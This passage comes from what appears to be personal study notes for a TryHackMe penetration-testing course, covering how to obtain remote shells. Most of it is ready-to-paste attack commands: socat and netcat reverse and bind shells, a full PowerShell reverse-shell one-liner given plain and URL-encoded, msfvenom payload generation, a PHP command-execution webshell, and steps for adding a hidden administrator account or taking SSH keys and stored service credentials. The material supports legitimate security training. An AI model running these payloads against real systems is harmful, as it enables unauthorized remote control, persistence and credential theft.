<p>This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for just under a year. When you run this command it will ask you to fill in information about the certificate. This can be left blank, or filled randomly.</p>
<p>We then need to merge the two created files into a single <code>.pem</code> file
<code>cat shell.key shell.crt &gt; shell.pem</code></p>
<p>Now, when we set up our reverse shell listener, we use
<code>socat OPENSSL-LISTEN:&lt;PORT&gt;,cert=shell.pem,verify=0 -</code></p>
<p>This sets up an OPENSSL listener using our generated certificate. <code>verify=0</code> tells the connection to not bother trying to validate that our certificate has been properly signed by a recognised authority. Please note that the certificate <em>must</em> be used on whichever device is listening.</p>
<p>To connect back, we would use
<code>socat OPENSSL:&lt;LOCAL-IP&gt;:&lt;LOCAL-PORT&gt;,verify=0 EXEC:/bin/bash</code></p>
<p>The same technique would apply for a bind shell
Target
<code>socat OPENSSL-LISTEN:&lt;PORT&gt;,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes</code></p>
<p>Attacker
<code>socat OPENSSL:&lt;TARGET-IP&gt;:&lt;TARGET-PORT&gt;,verify=0 -</code></p>
<p>Again, note that even for a Windows target, the certificate must be used with the listener, so copying the PEM file across for a bind shell is required.</p>
<h1>Common Shell Payloads</h1>
<p>In some versions of netcat (including the <code>nc.exe</code> Windows version included with Kali at <code>/usr/share/windows-resources/binaries</code>, and the version used in Kali itself: <code>netcat-traditional</code>) there is a <code>-e</code> option which allows you to execute a process on connection. For example, as a listener
<code>nc -lvnp &lt;PORT&gt; -e /bin/bash</code></p>
<p>Connecting to the above listener with netcat would result in a bind shell on the target.</p>
<p>Equally, for a reverse shell, connecting back with <code>nc &lt;LOCAL-IP&gt; &lt;PORT&gt; -e /bin/bash</code> would result in a reverse shell on the target.</p>
<p>However, this is not included in most versions of netcat as it is widely seen to be very insecure. On Windows where a static binary is nearly always required anyway, this technique will work perfectly. On Linux, however, we would instead use this code to create a listener for a bind shell
<code>mkfifo /tmp/f; nc -lvnp &lt;PORT&gt; &lt; /tmp/f | /bin/sh &gt;/tmp/f 2&gt;&amp;1; rm /tmp/f</code></p>
<p>The following paragraph is the technical explanation for this command.</p>
<p><em>The command first creates a <a href="https://www.linuxjournal.com/article/2156" target="_blank" rel="noopener noreferrer">named pipe</a> at <code>/tmp/f</code>. It then starts a netcat listener, and connects the input of the listener to the output of the named pipe. The output of the netcat listener (i.e. the commands we send) then gets piped directly into <code>sh</code>, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe, thus completing the circle.</em></p>
<p>A very similar command can be used to send a netcat reverse shell:</p>
<p><code>mkfifo /tmp/f; nc &lt;LOCAL-IP&gt; &lt;PORT&gt; &lt; /tmp/f | /bin/sh &gt;/tmp/f 2&gt;&amp;1; rm /tmp/f</code></p>
<p>This command is virtually identical to the previous one, other than using the netcat connect syntax, as opposed to the netcat listen syntax.</p>
<hr>
<p>When targeting a modern Windows Server, it is very common to require a Powershell reverse shell, so we&#x27;ll be covering the standard one-liner PSH reverse shell here.</p>
<p>This command is very convoluted, so for the sake of simplicity it will not be explained directly here. It is, however, an extremely useful one-liner to keep on hand
<code>powershell -c &quot;$client = New-Object System.Net.Sockets.TCPClient(&#x27;**&lt;ip&gt;**&#x27;,**&lt;port&gt;**);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + &#x27;PS &#x27; + (pwd).Path + &#x27;&gt; &#x27;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&quot;</code></p>
<p>In order to use this, we need to replace &quot;&lt; IP&gt;&quot; and &quot;&lt; port&gt;&quot; with an appropriate IP and choice of port. It can then be copied into a cmd.exe shell (or another method of executing commands on a Windows server, such as a webshell) and executed, resulting in a reverse shell.</p>
<p>For other common reverse shell payloads, <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" target="_blank" rel="noopener noreferrer">PayloadsAllTheThings</a> is a repository containing a wide range of shell codes (usually in one-liner format for copying and pasting), in many different languages.</p>
<h1>msfvenom</h1>
<p>Msfvenom: the one-stop-shop for all things payload related.</p>
<p>Part of the Metasploit framework, msfvenom is used to generate code for primarily reverse and bind shells. It is used extensively in lower-level exploit development to generate hexadecimal shellcode when developing something like a Buffer Overflow exploit; however, it can also be used to generate payloads in various formats (e.g. <code>.exe</code>, <code>.aspx</code>, <code>.war</code>, <code>.py</code>).</p>
<p>The standard syntax for msfvenom is as follows
<code>msfvenom -p &lt;PAYLOAD&gt; &lt;OPTIONS&gt;</code></p>
<p>For example, to generate a Windows x64 Reverse Shell in an exe format, we could use
<code>msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=&lt;listen-IP&gt; LPORT=&lt;listen-port&gt;</code></p>
<p>Here we are using a payload and four options</p>
<ul>
<li><strong>-f</strong> &lt; format&gt;<!-- -->
<ul>
<li>Specifies the output format. In this case that is an executable (exe)</li>
</ul>
</li>
<li><strong>-o</strong> &lt; file&gt;<!-- -->
<ul>
<li>The output location and filename for the generated payload.</li>
</ul>
</li>
<li><strong>LHOST=</strong>&lt; IP&gt;<!-- -->
<ul>
<li>Specifies the IP to connect back to. When using TryHackMe, this will be your <a href="http://10.10.10.10" target="_blank" rel="noopener noreferrer">tun0 IP address</a>. If you cannot load the link then you are not <a href="https://tryhackme.com/room/welcome" target="_blank" rel="noopener noreferrer">connected to the VPN</a>.</li>
</ul>
</li>
<li><strong>LPORT=</strong>&lt; port&gt;<!-- -->
<ul>
<li>The port on the local machine to connect back to. This can be anything between 0 and 65535 that isn&#x27;t already in use; however, ports below 1024 are restricted and require a listener running with root privileges.</li>
</ul>
</li>
</ul>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="staged-vs-stageless">Staged vs Stageless<a href="#staged-vs-stageless" class="hash-link" aria-label="Direct link to Staged vs Stageless" title="Direct link to Staged vs Stageless">​</a></h2>
<p><em><strong>staged</strong></em> reverse shell payloads and <em><strong>stageless</strong></em> reverse shell payloads.</p>
<ul>
<li><em><strong>Staged</strong></em> payloads are sent in two parts. The first part is called the <em>stager</em>. This is a piece of code which is executed directly on the server itself. It connects back to a waiting listener, but doesn&#x27;t actually contain any reverse shell code by itself. Instead it connects to the listener and uses the connection to load the real payload, executing it directly and preventing it from touching the disk where it could be caught by traditional anti-virus solutions. Thus the payload is split into two parts -- a small initial stager, then the bulkier reverse shell code which is downloaded when the stager is activated. Staged payloads require a special listener -- usually the Metasploit multi/handler</li>
<li><em><strong>Stageless</strong></em> payloads are more common -- these are what we&#x27;ve been using up until now. They are entirely self-contained in that there is one piece of code which, when executed, sends a shell back immediately to the waiting listener.</li>
</ul>
<p>Stageless payloads tend to be easier to use and catch; however, they are also bulkier, and are easier for an antivirus or intrusion detection program to discover and remove. Staged payloads are harder to use, but the initial stager is a lot shorter, and is sometimes missed by less-effective antivirus software. Modern day antivirus solutions will also make use of the Anti-Malware Scan Interface (AMSI) to detect the payload as it is loaded into memory by the stager, making staged payloads less effective than they would once have been in this area.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="metepreter">Metepreter<a href="#metepreter" class="hash-link" aria-label="Direct link to Metepreter" title="Direct link to Metepreter">​</a></h2>
<p>On the subject of Metasploit, another important thing to discuss is a <em>Meterpreter</em> shell. Meterpreter shells are Metasploit&#x27;s own brand of fully-featured shell. They are completely stable, making them a very good thing when working with Windows targets. They also have a lot of inbuilt functionality of their own, such as file uploads and downloads. If we want to use any of Metasploit&#x27;s post-exploitation tools then we need to use a meterpreter shell, however, that is a topic for another time. The downside to meterpreter shells is that they <em>must</em> be caught in Metasploit.</p>
<hr>
<h2 class="anchor anchorWithStickyNavbar_LWe7" id="payload-naming-conventions">Payload Naming Conventions<a href="#payload-naming-conventions" class="hash-link" aria-label="Direct link to Payload Naming Conventions" title="Direct link to Payload Naming Conventions">​</a></h2>
<p>When working with msfvenom, it&#x27;s important to understand how the naming system works. The basic convention is as follows
<code>&lt;OS&gt;/&lt;arch&gt;/&lt;payload&gt;</code></p>
<p>For example
<code>linux/x86/shell_reverse_tcp</code></p>
<p>This would generate a stageless reverse shell for an x86 Linux target.</p>
<p>The exception to this convention is Windows 32bit targets. For these, the arch is not specified.
<code>windows/shell_reverse_tcp   </code></p>
<p>For a 64bit Windows target, the arch would be specified as normal (x64).</p>
<p>Let&#x27;s break the payload section down a little further.</p>
<p>In the above examples the payload used was <code>shell_reverse_tcp</code>. This indicates that it was a <em>stageless</em> payload. Stageless payloads are denoted with underscores (<code>_</code>). The staged equivalent to this payload would be
<code>shell/reverse_tcp</code></p>
<p>As staged payloads are denoted with another forward slash (<code>/</code>).</p>
<p>This rule also applies to Meterpreter payloads. A Windows 64bit staged Meterpreter payload would look like this
<code>windows/x64/meterpreter/reverse_tcp</code></p>
<p>A Linux 32bit stageless Meterpreter payload would look like this
<code>linux/x86/meterpreter_reverse_tcp</code></p>
<hr>
<p>Aside from the <code>msfconsole</code> man page, the other important thing to note when working with msfvenom is
<code>msfvenom --list payloads</code></p>
<p>This can be used to list all available payloads, which can then be piped into <code>grep</code> to search for a specific set of payloads.</p>
<h1>Metasploit multi/handler</h1>
<p>Multi/Handler is a superb tool for catching reverse shells. It&#x27;s essential if you want to use Meterpreter shells, and is the go-to when using staged payloads.</p>
<ol>
<li>Open Metasploit with <code>msfconsole</code></li>
<li>Type <code>use multi/handler</code>, and press enter</li>
</ol>
<p>We can start the jobs by using <code>exploit -j</code> command to launch the module, running as a job in the background.</p>
<h1>WebShells</h1>
<p>There are times when we encounter websites that allow us an opportunity to upload, in some way or another, an executable file. Ideally we would use this opportunity to upload code that would activate a reverse or bind shell, but sometimes this is not possible. In these cases we would instead upload a webshell.</p>
<p>&quot;Webshell&quot; is a colloquial term for a script that runs inside a webserver (usually in a language such as PHP or ASP) which executes code on the server. Essentially, commands are entered into a webpage -- either through a HTML form, or directly as arguments in the URL -- which are then executed by the script, with the results returned and written to the page. This can be extremely useful if there are firewalls in place, or even just as a stepping stone into a fully fledged reverse or bind shell.</p>
<p>As PHP is still the most common server side scripting language, let&#x27;s have a look at some simple code for this.</p>
<p>In a very basic one line format
<code>&lt;?php echo &quot;&lt;pre&gt;&quot; . shell_exec($_GET[&quot;cmd&quot;]) . &quot;&lt;/pre&gt;&quot;; ?&gt;</code></p>
<p>This will take a GET parameter in the URL and execute it on the system with <code>shell_exec()</code>. Essentially, what this means is that any commands we enter in the URL after <code>?cmd=</code> will be executed on the system -- be it Windows or Linux. The &quot;pre&quot; elements are to ensure that the results are formatted correctly on the page.</p>
<p>There are a variety of webshells available on Kali by default at <code>/usr/share/webshells</code> -- including the infamous <a href="https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" target="_blank" rel="noopener noreferrer">PentestMonkey php-reverse-shell</a> -- a full reverse shell written in PHP. Note that most generic, language specific (e.g. PHP) reverse shells are written for Unix based targets such as Linux webservers. They will not work on Windows by default.</p>
<p>When the target is Windows, it is often easiest to obtain RCE using a web shell, or by using msfvenom to generate a reverse/bind shell in the language of the server. With the former method, obtaining RCE is often done with a URL Encoded Powershell Reverse Shell. This would be copied into the URL as the <code>cmd</code> argument
<code>powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27&lt;IP&gt;%27%2C&lt;PORT&gt;%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22</code></p>
<p>it has been URL encoded to be used safely in a GET parameter. Remember that the IP and Port (bold, towards end of the top line) will still need to be changed in the above code.</p>
<h1>Next Steps</h1>
<p>On Linux ideally we would be looking for opportunities to gain access to a user account. SSH keys stored at <code>/home/&lt;user&gt;/.ssh</code> are often an ideal way to do this. In CTFs it&#x27;s also not infrequent to find credentials lying around somewhere on the box. Some exploits will also allow you to add your own account. In particular something like <a href="https://dirtycow.ninja/" target="_blank" rel="noopener noreferrer">Dirty C0w</a> or a writeable /etc/shadow or /etc/passwd would quickly give you SSH access to the machine, assuming SSH is open.</p>
<p>On Windows the options are often more limited. It&#x27;s sometimes possible to find passwords for running services in the registry. VNC servers, for example, frequently leave passwords in the registry stored in plaintext. Some versions of the FileZilla FTP server also leave credentials in an XML file at <code>C:\Program Files\FileZilla Server\FileZilla Server.xml</code><br>
<!-- --> or <code>C:\xampp\FileZilla Server\FileZilla Server.xml</code><br>
<!-- -->. These can be MD5 hashes or in plaintext, depending on the version.</p>
<p>Ideally on Windows you would obtain a shell running as the SYSTEM user, or an administrator account running with high privileges. In such a situation it&#x27;s possible to simply add your own account (in the administrators group) to the machine, then log in over RDP, telnet, winexe, psexec, WinRM or any number of other methods, dependent on the services running on the box.</p>
<p>The syntax for this is as follows
<code>net user &lt;username&gt; &lt;password&gt; /add</code>
<code>net localgroup administrators &lt;username&gt; /add</code></p>
<hr>
<p>The important take away from this task
Reverse and Bind shells are an essential technique for gaining remote code execution on a machine, however, they will never be as fully featured as a native shell. Ideally we always want to escalate into using a &quot;normal&quot; method for accessing the machine, as this will invariably be easier to use for further exploitation of the target.</p></div></article><nav class="pagination-nav docusaurus-mt-lg" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/docs/Jr Penetration Tester/Privilege Escalation/Linux Privilege Escalation"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">Linux Privilege Escalation</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/docs/Jr Penetration Tester/Privilege Escalation/Windows Privilege Escalation"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">Windows Privilege Escalation</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#netcat" class="table-of-contents__link toc-highlight">Netcat</a></li><li><a href="#socat" class="table-of-contents__link toc-highlight">Socat</a></li><li><a href="#metasploit--multihandler" class="table-of-contents__link toc-highlight">Metasploit--multi/handler</a></li><li><a href="#msfvenom" class="table-of-contents__link toc-highlight">Msfvenom</a></li><li><a href="#reverse-shells" class="table-of-contents__link toc-highlight">Reverse Shells</a></li><li><a href="#bind-shells" class="table-of-contents__link toc-highlight">Bind Shells</a></li><li><a href="#technique-1-python" class="table-of-contents__link toc-highlight">Technique 1: Python</a></li><li><a href="#technique-2-rlwrap" class="table-of-contents__link toc-highlight">Technique 2: rlwrap</a></li><li><a href="#technique-3-socat" class="table-of-contents__link toc-highlight">Technique 3: Socat</a></li><li><a href="#reverse-shells-1" class="table-of-contents__link toc-highlight">Reverse Shells</a></li><li><a href="#bind-shells-1" class="table-of-contents__link toc-highlight">Bind Shells</a></li><li><a href="#staged-vs-stageless" class="table-of-contents__link toc-highlight">Staged vs Stageless</a></li><li><a href="#metepreter" class="table-of-contents__link toc-highlight">Metepreter</a></li><li><a href="#payload-naming-conventions" class="table-of-contents__link toc-highlight">Payload Naming Conventions</a></li></ul></div></div></div></div></main></div></div></div><footer class="footer footer--dark"><div class="container container-fluid"><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2024 Gabriel@pochacco.top</div></div></div></footer></div>
</body>
</html>